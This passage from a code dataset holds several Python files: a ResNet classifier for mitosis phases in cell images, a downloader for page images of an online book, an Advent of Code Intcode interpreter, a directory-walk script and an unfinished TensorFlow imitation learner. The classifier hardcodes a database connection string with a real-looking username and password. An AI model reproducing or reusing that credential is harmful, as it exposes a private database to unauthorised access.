'/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/'\n self.csv_input = 'input_data_files/mito_annotations_all.csv' #\n self.f_type = 'save_flat_proj_reg_path'\n self.f_label = f_label\n # human readable classes\n self.m_class_names = np.array([\"not mitotic\",\n \"M1: prophase 1\",\n \"M2: prophase 2\",\n \"M3: pro metaphase 1\",\n \"M4: pro metaphase 2\",\n \"M5: metaphase\",\n \"M6: anaphase\",\n \"M7: telophase-cytokinesis\"])\n\n self.dp = None\n self.dp_no_annots = None\n self.pred_mito_labels = None\n\n def class_names(self):\n return self.m_class_names\n\n def read_and_filter_input(self, f_label='mitosis_label'):\n\n filt = f_label + ' >= 0'\n\n conn_string = \"postgresql://ro:BR9p66@pg-aics-modeling-01/pg_modeling\"\n conn = create_engine(conn_string)\n dfio = pd.read_sql_table('irena_classifications', conn, index_col='id')\n\n df = dfio.copy(deep=True)\n\n # add absolute path '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/' + df[self.f_type]\n # df[self.f_type] = '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03' + df[self.f_type]\n\n return df\n\n def transform(self):\n pass\n\n\n def create_data_provider(self, df, splits_pkl, testf=0.2):\n split_fracs = {'train': 1.0 - testf, 'test': testf}\n split_seed = 1\n\n dataset_kwargs = {split: {'target': 'target_numeric', 'image': self.f_type, 'uniqueID': 'save_h5_reg_path'} for split 
in split_fracs.keys()}\n dataloader_kwargs = {\n split: {'batch_size': self.BATCH_SIZE, 'shuffle': True, 'drop_last': True, 'num_workers': 4, 'pin_memory': True} for split in split_fracs.keys()}\n\n dataset_kwargs['train']['imageTransform'] = self.transform()\n dataset_kwargs['test']['imageTransform'] = self.transform()\n\n\n splits_data = pickle.load(open(splits_pkl, \"rb\"))\n\n self.dp = DataframeDataProvider(df, datasetClass=DatasetSingleRGBImageToTargetUniqueID,\n split_fracs=splits_data,\n split_seed=split_seed,\n uniqueID='save_h5_reg_path',\n dataset_kwargs=dataset_kwargs,\n dataloader_kwargs=dataloader_kwargs)\n\n\n def check_images(self, model, dkey='test'):\n i, mb = next(enumerate(self.dp.dataloaders[dkey]))\n print(\"mb\")\n ims_labels_preds = [(im, label, pred) for i, (im, label, pred) in enumerate(\n zip(mb['image'], mb['target'].numpy(),\n model(Variable(mb['image']).cuda(self.GPU_ID)).data.cpu().max(1)[1].numpy())) if i < 16]\n img = ims_labels_preds_to_grid(ims_labels_preds, ncol=4)\n fname = \"Inspect_{0}\".format(dkey)\n img.save(self.ofname(fname, \"png\"))\n\n def ofname(self, b_name, f_ext):\n fname = \"{0}_{1}.{2}\".format(b_name, str(self.iter_n).zfill(2), f_ext)\n return os.path.join(self.base_path, fname)\n\n def generate_class_weights(self):\n classes, weights = classes_and_weights(self.dp, split='train', target_col='target_numeric')\n weights = weights.cuda(self.GPU_ID)\n CWP = collections.namedtuple('CWP', ['cls', 'weights'])\n return CWP(classes, weights = weights)\n\n def phases(self):\n return self.dp.dataloaders.keys();\n\n def pred_phases(self):\n return self.dp\n\n def select_n_train_n_run_model(self):\n cwp = self.generate_class_weights()\n model_name = 'resnet18'\n model_class = getattr(models, model_name)\n model = model_class(pretrained=True)\n\n model.fc = nn.Linear(model.fc.in_features, len(cwp.cls), bias=True)\n model = model.cuda(self.GPU_ID)\n\n N_epochs = 10\n model = train_model(model, self.dp,\n class_weights=cwp.weights,\n class_names=self.class_names(),\n N_epochs=N_epochs,\n phases=('train', 'test'),\n learning_rate=1e-4,\n gpu_id=self.GPU_ID)\n\n torch.save(model.state_dict(), self.ofname('saved_model_10E', 'pt'))\n self.check_images(model, 'train')\n\n model.eval()\n\n #mito_labels = {k: {'true_labels': [], 'pred_labels': [], 'probability': [], 'pred_entropy': [], 'uniqueID': []} for k in self.dp.dataloaders.keys()}\n mito_labels = {k: {} for k in self.dp.dataloaders.keys()}\n cm_data = {k: {'true_labels': [], 'pred_labels': []} for k in self.dp.dataloaders.keys()}\n\n for phase in self.dp.dataloaders.keys():\n for i, mb in tqdm_notebook(enumerate(self.dp.dataloaders[phase]), total=len(self.dp.dataloaders[phase]),\n postfix={'phase': phase}):\n x = mb['image']\n y = mb['target']\n u = mb['uniqueID']\n\n y_hat_pred = model(Variable(x).cuda(self.GPU_ID))\n _, y_hat = y_hat_pred.max(1)\n\n probs = F.softmax(y_hat_pred.data.cpu(), dim=1)\n entropy = -torch.sum(probs * torch.log(probs), dim=1)\n\n true_label = list(y.data.cpu().squeeze().numpy())\n pred_label = list(y_hat.data.cpu().numpy())\n prob = list(F.softmax(y_hat_pred.data.cpu(), dim=1).numpy())\n pred_ent = list(entropy.data.cpu().numpy())\n\n for idx in range(len(u)):\n mito_labels[phase][u[idx]] = {'true_label': true_label[idx],\n 'pred_label': pred_label[idx],\n 'pred_entropy': pred_ent[idx],\n 'probability': prob[idx]\n }\n\n cm_data[phase]['true_labels'] += true_label\n cm_data[phase]['pred_labels'] += pred_label\n #capture training / test data report\n self.mito_labels = 
mito_labels\n\n\n\n # model_analysis(mito_labels['train']['true_labels'], mito_labels['train']['pred_labels'])\n\n fig, ax = plot_confusion_matrix(cm_data['train']['true_labels'], cm_data['train']['pred_labels'], classes=self.class_names())\n fig.savefig(self.ofname('CF_training', 'png'))\n plt.close(fig)\n\n fig, ax = plot_confusion_matrix(cm_data['test']['true_labels'], cm_data['test']['pred_labels'], classes=self.class_names())\n fig.savefig(self.ofname('CF_test', 'png'))\n plt.close(fig)\n\n print(\"done with training and test.\")\n #Apply to unannotated data\n\n df_no_annots_unfiltered = None\n # read file\n df_no_annots_unfiltered = pd.read_csv(self.csv_input, # 'input_data_files/mito_annotations_all.csv',\n dtype={'structureSegOutputFilename': str,\n 'structureSegOutputFolder': str}\n )\n\n # filter for NaN mito annotations -- a NaN isn't equal to itself\n lfilt = self.f_label + ' != ' + self.f_label\n df_no_annots = df_no_annots_unfiltered.query(lfilt)\n df_no_annots = df_no_annots.reset_index(drop=True)\n\n # add absolute path #save_flat_proj_reg_path\n df_no_annots[self.f_type] = '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/' + df_no_annots[self.f_type]\n\n # filter for rows where images are actually present\n df_no_annots = filter_dataframe(df_no_annots, '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/', self.f_type)\n df_no_annots['target_numeric'] = -1\n df_no_annots['target_numeric'] = df_no_annots['target_numeric'].astype(np.int64)\n\n # save a csv\n csv_out = self.ofname('mito_annotations_missing_with_pngs_{0}'.format(str(self.iter_n).zfill(2)), \"csv\")\n df_no_annots.to_csv(csv_out, index=False)\n\n split_fracs = {'all': 1.0}\n split_seed = 1\n\n dataset_kwargs = {split: {'target': 'target_numeric', 'image': self.f_type, 'uniqueID': 'save_h5_reg_path'} for split\n in split_fracs.keys()}\n dataloader_kwargs = {\n split: {'batch_size': self.BATCH_SIZE, 'shuffle': False, 'drop_last': False, 'num_workers': 4, 'pin_memory': True}\n for split in split_fracs.keys()}\n\n dataset_kwargs['all']['imageTransform'] = self.transform()\n\n self.dp_no_annots = DataframeDataProvider(df_no_annots, datasetClass=DatasetSingleRGBImageToTargetUniqueID,\n split_fracs=split_fracs,\n split_seed=split_seed,\n uniqueID='save_h5_reg_path',\n dataset_kwargs=dataset_kwargs,\n dataloader_kwargs=dataloader_kwargs)\n\n print(\"get predictions.\")\n # Get predictions\n model.eval()\n\n p_mito_labels = {phase: {'pred_labels': [], 'pred_entropy': [], 'pred_uid': [], 'probability': [], 'uid': []} for phase in\n self.dp_no_annots.dataloaders.keys()}\n\n for phase in self.dp_no_annots.dataloaders.keys():\n for i, mb in tqdm_notebook(enumerate(self.dp_no_annots.dataloaders[phase]),\n total=len(self.dp_no_annots.dataloaders[phase]), postfix={'phase': phase}):\n x = mb['image']\n y = mb['target']\n u = mb['uniqueID']\n\n y_hat_pred = model(Variable(x).cuda(self.GPU_ID))\n _, y_hat = y_hat_pred.max(1)\n\n probs = F.softmax(y_hat_pred.data.cpu(), dim=1)\n entropy = -torch.sum(probs * torch.log(probs), dim=1)\n\n p_mito_labels[phase]['pred_labels'] += list(y_hat.data.cpu().numpy())\n p_mito_labels[phase]['pred_entropy'] += list(entropy.data.cpu().numpy())\n p_mito_labels[phase]['probability'] += list(probs.numpy())\n #p_mito_labels[phase]['uid'] += u\n\n self.pred_mito_labels = p_mito_labels\n\n def save_out(self):\n df_pred = pd.DataFrame({'MitosisLabelPredicted': self.pred_mito_labels['all']['pred_labels'],\n 'MitosisLabelPredictedEntropy': self.pred_mito_labels['all']['pred_entropy'],\n 
self.dp_no_annots.opts['uniqueID']: self.pred_mito_labels['all']['pred_uid'],\n 'MitosisLabelProbability': self.pred_mito_labels['all']['probability']})\n\n df_out = pd.merge(self.dp_no_annots.dfs['all'], df_pred, how='inner', on=self.dp_no_annots.opts['uniqueID'])\n df_out = df_out.drop(columns='target_numeric')\n fname = self.ofname('mitotic_predictions_on_unannotated_cells', 'csv')\n df_out.to_csv(fname)\n\n def run_me(self):\n df = self.read_and_filter_input()\n self.create_data_provider(df, \"splits_db.pkl\")\n print(\"ready to run.\")\n self.select_n_train_n_run_model()\n #self.save_out()\n #precision, recall = self.precision_recall_vec(self.mito_labels['test']['true_labels'], self.mito_labels['test']['probability'])\n #self.plot_prec_recall(precision, recall, self.ofname(\"precision_recall\", \"png\"))\n print(\"finished.\")\n\n def precision_recall_vec(self, tru_label, probs):\n precision = []\n recall = []\n for idx in range(8):\n y_test = [1 if (x == idx) else 0 for x in tru_label]\n y_score = [x[idx] for x in probs]\n tpre, trec, _ = precision_recall_curve(y_test, y_score)\n precision.append(tpre)\n recall.append(trec)\n return (precision, recall)\n\n def plot_prec_recall(self, precision, recall, fname):\n labels = ['not mitotic', 'M1: prophase 1', 'M2: prophase 2', 'M3: pro metaphase 1', 'M4: pro metaphase 2', 'M5: metaphase', 'M6: anaphase', 'M7: telophase-cytokinesis']\n # hexcolors = ['#b3e2cd', '#fdcdac', '#cbd5e8', '#f4cae4', '#e6f5c9', '#fff2ae', '#f1e2cc', '#cccccc']\n colors = sns.color_palette(\"hls\", 8)\n plt.figure() # figsize=(7, 8))\n lines = []\n\n for i, color in zip(range(8), colors):\n l, = plt.plot(recall[i], precision[i], color=color, lw=2)\n lines.append(l)\n # labels.append('Precision-recall for non-mitotic')\n\n fig = plt.gcf()\n fig.subplots_adjust(bottom=0.25)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title('Extension of Precision-Recall curve to multi-class')\n lg = plt.legend(lines, labels, loc=(1.2, .5), prop=dict(size=14))\n plt.savefig(fname, bbox_extra_artists=(lg,), bbox_inches='tight')\n\n\n\nclass MitosisClassifierThreeChannel(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry embedded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pane within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each frame\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [x[2, y1s:(w + y1s), x1s:(w + x1s)], x[2, y1s:(w + y1s), x2s:(w + x2s)],\n x[2, y2s:(w + y2s), x3s:(w + x3s)]]))])\n\n\nclass MitosisClassifierOneChannel(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n\n\n def transform(self):\n return self.one_channel_transform()\n\n\n def one_channel_transform(self):\n w = 224\n\n mask = torch.ones([3, w, w])\n mask[1, :, :] = 0\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize((w, w)),\n transforms.ToTensor(), transforms.Lambda(lambda x: mask*x)])\n\nclass MitosisClassifierZProj(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.f_type = 'save_flat_reg_path'\n\n\n def transform(self):\n return self.z_channel_transform()\n\n\n def z_channel_transform(self):\n w = 224\n\n mask = torch.ones([3, w, w])\n mask[1, :, :] = 0\n\n\n return transforms.Compose([transforms.ToPILImage(), transforms.Resize(256), transforms.CenterCrop(224),\n transforms.ToTensor(), transforms.Lambda(lambda x: mask*x)])\n\n\nclass Mitosis2CZ(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.base_path = os.path.join(self.base_path, \"Z\")\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry embedded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pane within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each frame\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n blank = torch.zeros([w, w])\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [x[0, y1s:(w + y1s), x2s:(w + x2s)],\n blank,\n x[2, y1s:(w + y1s), x2s:(w + x2s)]\n ]))])\n\n\nclass Mitosis2CX(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.base_path = os.path.join(self.base_path, \"X\")\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry embedded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pane within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each frame\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n\n blank = torch.zeros([w, w])\n\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [x[0, y1s:(w + y1s), x1s:(w + x1s)],\n blank,\n x[2, y1s:(w + y1s), x1s:(w + x1s)]\n ]))])\n\n\n\n\nclass Mitosis2CY(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.base_path = os.path.join(self.base_path, \"Y\")\n\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry embedded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pane within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each frame\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n blank = torch.zeros([w, w])\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [\n x[0, y2s:(w + y2s), x3s:(w + x3s)],\n blank,\n x[2, y2s:(w + y2s), x3s:(w + x3s)]\n ]))])\n","sub_path":"ThreeChannel.py","file_name":"ThreeChannel.py","file_ext":"py","file_size_in_byte":21844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"480661156","text":"import urllib\n# test url\nhtml_base = \"http://202.119.70.51:88/png/png.dll?did=a174&pid=A7421810F5CDEBDC155FF07C5B49C86948799B8BC53C4C40FA101644549576313F82ABEF167B9445B880B868074DAACEEC2D7C5BE2E51E5C6454E27D56E41C16D11B6CF00E124DA036C6A53FEEA65DBC60852EA62D2235B1706754D32D93A40CF9B3E83EE631BEBF5F8AE2EBE853E56AF048&jid=/\"\n# online picture\nhtml_extension = \".jpg\"\n# save pictures in directory\ndirectory = \"D:\\\\misc\\python\\\\test\\\\\"\n# download all pictures of the online book\nfor index in range(1,434):\n html_index = str(index)\n html_len = len(html_index)\n if html_len == 1:\n html_index = \"00000\" + html_index\n\n if html_len == 2:\n html_index = \"0000\" + html_index\n\n if html_len == 3:\n html_index = \"000\" + html_index\n\n if html_len == 4:\n html_index = \"00\" + html_index\n\n if html_len == 5:\n html_index = \"0\" + html_index\n print(html_index)\n # the picture's url\n html = html_base + html_index + html_extension\n f = open(directory + html_index + '.jpg', 'wb')\n request = urllib.urlopen(html)\n buf = request.read()\n f.write(buf)\n f.close()\n","sub_path":"libDownloader.py","file_name":"libDownloader.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"162023364","text":"\"\"\"\nsolution adventofcode day 5 part 2.\n\nhttps://adventofcode.com/2019/day/5#part2\n\nauthor: pca\n\"\"\"\n\nimport argparse\nfrom pathlib import Path\nfrom general.general import read_file\nimport operator\n\ndef is_not_zero(value):\n return value != 0\n\n\ndef is_zero(value):\n return value == 0\n\ndef is_less(a, b):\n return 1 if a < b else 0\n\ndef is_equal(a, b):\n return 1 if a == b else 0\n\nclass IntMachine:\n OP_ADD = 1\n OP_MUL = 2\n OP_INPUT = 3\n OP_OUTPUT = 4\n OP_JMP_TRUE = 5\n OP_JMP_FALSE = 6\n OP_LESS = 7\n OP_EQUAL = 8\n OP_HALT = 99\n\n def __init__(self, program_code, input_values):\n self.pc = 0\n\n if len(program_code) > 0:\n self.memory = {pos: int(ch) for pos, ch in enumerate(program_code.split(','))}\n else:\n self.memory = dict()\n\n self.output = list()\n self.input = list(input_values)\n self.halted = False\n self.max_steps = 50000\n\n def read_next_input(self):\n \"\"\"\n read in from the input queue.\n \"\"\"\n input_value = self.input[0]\n self.input = self.input[1:]\n\n return input_value\n\n def add_output(self, value):\n self.output.append(value)\n\n def halt(self):\n self.halted = True\n\n def get_value(self, location, immediate):\n if immediate == 1:\n return 
self.memory[location]\n else:\n store_loc = self.memory[location]\n return self.memory[store_loc]\n\n\n def execute_instruction(self):\n funcs = {IntMachine.OP_ADD: operator.add,\n IntMachine.OP_MUL: operator.mul,\n IntMachine.OP_INPUT: self.read_next_input,\n IntMachine.OP_OUTPUT: self.add_output,\n IntMachine.OP_JMP_TRUE: is_not_zero,\n IntMachine.OP_JMP_FALSE: is_zero,\n IntMachine.OP_LESS: is_less,\n IntMachine.OP_EQUAL: is_equal,\n IntMachine.OP_HALT: self.halt}\n\n # lookup for how many steps to move the pc after an instruction\n pc_moves = {IntMachine.OP_ADD: 4,\n IntMachine.OP_MUL: 4,\n IntMachine.OP_INPUT: 2,\n IntMachine.OP_OUTPUT: 2,\n IntMachine.OP_JMP_TRUE: 3,\n IntMachine.OP_JMP_FALSE: 3,\n IntMachine.OP_LESS: 4,\n IntMachine.OP_EQUAL: 4,\n IntMachine.OP_HALT: 1}\n\n opcode, (p1, p2, p3) = IntMachine.decode_instruction(self.memory[self.pc])\n\n fn = funcs[opcode]\n next_pc = self.pc + pc_moves[opcode]\n\n if opcode in [IntMachine.OP_ADD, IntMachine.OP_MUL, IntMachine.OP_LESS, IntMachine.OP_EQUAL]:\n val1 = self.get_value(self.pc + 1, p1)\n val2 = self.get_value(self.pc + 2, p2)\n # check to be on the safe side\n if p3 == 1:\n raise ValueError(f\"Error at location {self.pc} for instruction {opcode}.\")\n\n res = fn(val1, val2)\n store_loc = self.memory[self.pc + 3]\n self.memory[store_loc] = res\n # input\n elif opcode == IntMachine.OP_INPUT:\n if p1 == 1:\n raise ValueError(f\"Error at location {self.pc} for instruction {opcode}.\")\n res = fn()\n store_loc = self.memory[self.pc + 1]\n self.memory[store_loc] = res\n # output\n elif opcode == IntMachine.OP_OUTPUT:\n val1 = self.get_value(self.pc + 1, p1)\n fn(val1)\n elif opcode in [IntMachine.OP_JMP_FALSE, IntMachine.OP_JMP_TRUE]:\n val1 = self.get_value(self.pc + 1, p1)\n\n # check to be on the safe side\n if p3 == 1:\n raise ValueError(f\"Error at location {self.pc} for instruction {opcode}.\")\n\n res = fn(val1)\n\n if res:\n next_pc = self.get_value(self.pc + 2, p2)\n\n elif opcode == IntMachine.OP_HALT:\n fn()\n\n self.pc = next_pc\n\n @staticmethod\n def decode_instruction(instruction):\n \"\"\"\n ABCDE\n 01002\n\n DE - two-digit opcode, 02 == opcode 2\n C - mode of 1st parameter, 0 == position mode\n B - mode of 2nd parameter, 1 == immediate mode\n A - mode of 3rd parameter, 0 == position mode,\n omitted due to being a leading zero\n \"\"\"\n\n instruction_str = str(instruction)\n\n # get the instruction (last two chars)\n opcode = int(instruction_str[-2:])\n\n # now get the param modes\n mode_param_1 = 1 if instruction_str[-3:-2] == '1' else 0\n mode_param_2 = 1 if instruction_str[-4:-3] == '1' else 0\n mode_param_3 = 1 if instruction_str[-5:-4] == '1' else 0\n\n param_modes = mode_param_1, mode_param_2, mode_param_3\n\n return opcode, param_modes\n\n\n def run(self):\n \"\"\"\n Runs the loaded program\n \"\"\"\n print(\"Starting.\")\n\n steps = 0\n\n # run until the program halts, with max_steps as a safety cap\n while not self.halted and steps < self.max_steps:\n self.execute_instruction()\n\n steps += 1\n\n print(f\"Ending after steps: {steps}\")\n\n\ndef main(args):\n print(args.location)\n\n program_code = read_file(args.location, 'input_day5.txt')[0]\n\n int_machine = IntMachine(program_code, [5])\n int_machine.run()\n\n print(int_machine.output)\n\n return int_machine\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='puzzle.')\n parser.add_argument(\"--location\",\n type=Path,\n required=True,\n help=\"Location puzzles\")\n args = parser.parse_args()\n\n int_machine = 
main(args)\n","sub_path":"app/day5_2.py","file_name":"day5_2.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"374967619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 10 22:56:30 2018\n\n@author: tzhou\n\"\"\"\nimport os \n\ndef main():\n for root, dirs, files in os.walk('./'):\n for filename in files:\n filepath = os.sep.join([root, filename])\n dirname = root.split(os.sep)[-1]\n print('{}: {}, {}'.format(filepath, dirname, filename))\n \nif __name__ == '__main__':\n main()","sub_path":"os.py","file_name":"os.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"320655189","text":"import tensorflow as tf\r\nimport time\r\nimport param\r\nimport dataHandler as dh\r\nimport numpy as np\r\nfrom sklearn.neighbors import LSHForest\r\nimport h5py\r\n\r\nimport NeuralNetwork as nn\r\n\r\ntf.logging.set_verbosity(0)\r\n\r\nclass imitationLearner():\r\n def __init__(self, session, param = param.neuralParam):\r\n #learner session\r\n self.sess = session\r\n #parameters of the learner\r\n self.param = param\r\n #placeholders\r\n self.input_ph = tf.placeholder(\r\n tf.float32, self.param.flat_input_shape, name=\"inputData_ph\")\r\n self.output_ph = tf.placeholder(\r\n tf.float32, self.param.output_shape, name=\"output_ph\")\r\n self.label_ph = tf.placeholder(\r\n tf.float32, self.param.output_shape, name=\"label_ph\")\r\n self.keep_prob = tf.placeholder(\r\n tf.float32, name=\"dropout_ph\")\r\n\r\n #Creates the learner and every operation necessary\r\n self.output_ph = nn.createLearner(self.input_ph,\r\n self.keep_prob,\r\n self.param)\r\n self.loss_op = self.loss()\r\n self.train_op = self.training()\r\n self.eval_op = self.evaluation()\r\n\r\n #datahandler for data manipulation\r\n self.dh = dh.dataHandler()\r\n\r\n\r\n def loss(self):\r\n# loss_op = tf.losses.log_loss(self.output_ph,self.label_ph)\r\n if self.param.loss == \"mse\":\r\n loss_op = tf.reduce_sum(tf.square(self.output_ph - self.label_ph))\r\n# elif self.param.loss == \"cos\":\r\n# loss_op = tf.losses.cosine_distance(self.label_ph,\r\n# self.output_ph)\r\n# elif self.param.loss == \"hinge\":\r\n# loss_op = tf.losses.hinge_loss(self.label_ph,\r\n# self.output_ph)\r\n elif self.param.loss == \"softmax\":\r\n loss_op = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(\r\n labels=tf.nn.softmax(self.label_ph),\r\n logits=tf.nn.softmax(self.output_ph)))\r\n# elif self.param.\r\n else:\r\n print('loss function not defined')\r\n raise\r\n#\r\n## tf.losses.log_loss(self.output_ph,\r\n## self.label_ph,\r\n## weights=2.0,\r\n## epsilon = 0.01)\r\n\r\n# loss_op = tf.nn.softmax_cross_entropy_with_logits(\r\n# labels=tf.nn.softmax(self.label_ph),\r\n# logits=self.output_ph)\r\n return loss_op\r\n\r\n\r\n\r\n def training(self):\r\n # Add a scalar summary for the snapshot loss.\r\n# tf.summary.scalar('loss', tf.reduce_mean(self.loss_op))\r\n # Create the gradient descent optimizer with the given learning rate.\r\n optimizer = tf.train.GradientDescentOptimizer(self.param.learning_rate)\r\n # Create a variable to track the global step.\r\n# train_op = tf.train.AdamOptimizer(self.param.learning_rate).minimize(self.loss_op)\r\n\r\n# train_op = tf.train.RMSPropOptimizer(self.param.learning_rate).minimize(self.loss_op)\r\n global_step = tf.Variable(0, name='global_step', trainable=False)\r\n# # Use the optimizer to apply the gradients that 
minimize the loss\r\n# #(and also increment the global step counter) as a single training step.\r\n train_op = optimizer.minimize(self.loss_op, global_step=global_step)\r\n return train_op\r\n\r\n\r\n\r\n def evaluation(self):\r\n correct_prediction = tf.equal(tf.argmax(self.label_ph,1),\r\n tf.argmax(self.output_ph,1))\r\n #Cast to floating point numbers and then take the mean\r\n return tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n\r\n\r\n def run(self):\r\n #Loads the MNIST dataset\r\n print(\"run\")\r\n self.dh.setFilename(\"mnist.hdf5\")#--------------modify\r\n testBatch = self.dh.loadBatch(\"test\")\r\n lsh = LSHForest(min_hash_match=8, n_candidates=10, n_estimators=50,\r\n n_neighbors=10, radius=10.0, radius_cutoff_ratio=0.5,\r\n random_state=42)\r\n dhGen = dh.dataHandler()\r\n\r\n total = self.dh.loadRange(0,70000)\r\n# print(total)\r\n total = total[:][0:794]\r\n lsh.fit(total)\r\n\r\n for i, data in enumerate(total):\r\n distances, indices = lsh.kneighbors(data[50], n_neighbors=2)\r\n # print(indices)\r\n # print(distances)\r\n if distances[0,0] < 1.1e-15:\r\n pass#identical in mem\r\n\r\n if distances[0,1] < 2.0e-01:\r\n pass#close in mem\r\n else:\r\n dhGen.addData(data)\r\n\r\n raise\r\n\r\n #separate data\r\n dataShape = self.dh.getDataShape()\r\n testData = testBatch[:,dataShape[0,0]:dataShape[0,1]]\r\n testLabel = testBatch[:,dataShape[1,0]:dataShape[1,1]]\r\n# self.dh.setFilename(\"rl_data.hdf5\")\r\n# with h5py.File(self.dh.fileName, \"r\", libver='latest') as f:\r\n# print(\"openFile\")\r\n# testList = f[\"batch/test/list\"]\r\n# testBatch = self.dh.load(testList[0:2000])\r\n# dataShape = self.dh.getDataShape()\r\n# testData = testBatch[:,dataShape[0,0]:dataShape[0,1]]\r\n# testLabel = testBatch[:,dataShape[1,0]:dataShape[1,1]]\r\n\r\n# dhGen = dh.dataHandler()\r\n# dataShape = self.dh.getDataShape()\r\n# print(dataShape)\r\n# raise\r\n\r\n # Add the variable initializer Op.\r\n init = tf.global_variables_initializer()\r\n\r\n #start the session\r\n self.sess.run(init)\r\n\r\n #load the test batch\r\n print(\" \".join([\"loading\",self.dh.fileName]))\r\n# testBatch = self.dh.loadBatch(\"test\")\r\n\r\n\r\n #Training loop\r\n print(\"Begin training\")\r\n# start_time = time.time()\r\n for step in range(self.param.max_steps):\r\n batch = self.dh.loadBatch()\r\n\r\n\r\n feed_dict = {self.input_ph:batch[:,dataShape[0,0]:dataShape[0,1]],\r\n self.label_ph:batch[:,dataShape[1,0]:dataShape[1,1]],\r\n self.keep_prob: 0.5}\r\n\r\n\r\n # Run one step of the model.\r\n _, loss = self.sess.run([self.train_op,self.loss_op],\r\n feed_dict=feed_dict)\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\n# if step >= 30000:\r\n# for d, l in zip(batch[:,dataShape[0,0]:dataShape[0,1]],loss):\r\n# dhGen.addData(d, l)\r\n\r\n #Show loss of network\r\n# if step % 10 == 0:\r\n# duration = time.time() - start_time\r\n# print('Step {0}: loss = {1:.10f} ({2:.3f} sec)'.format(step, loss, 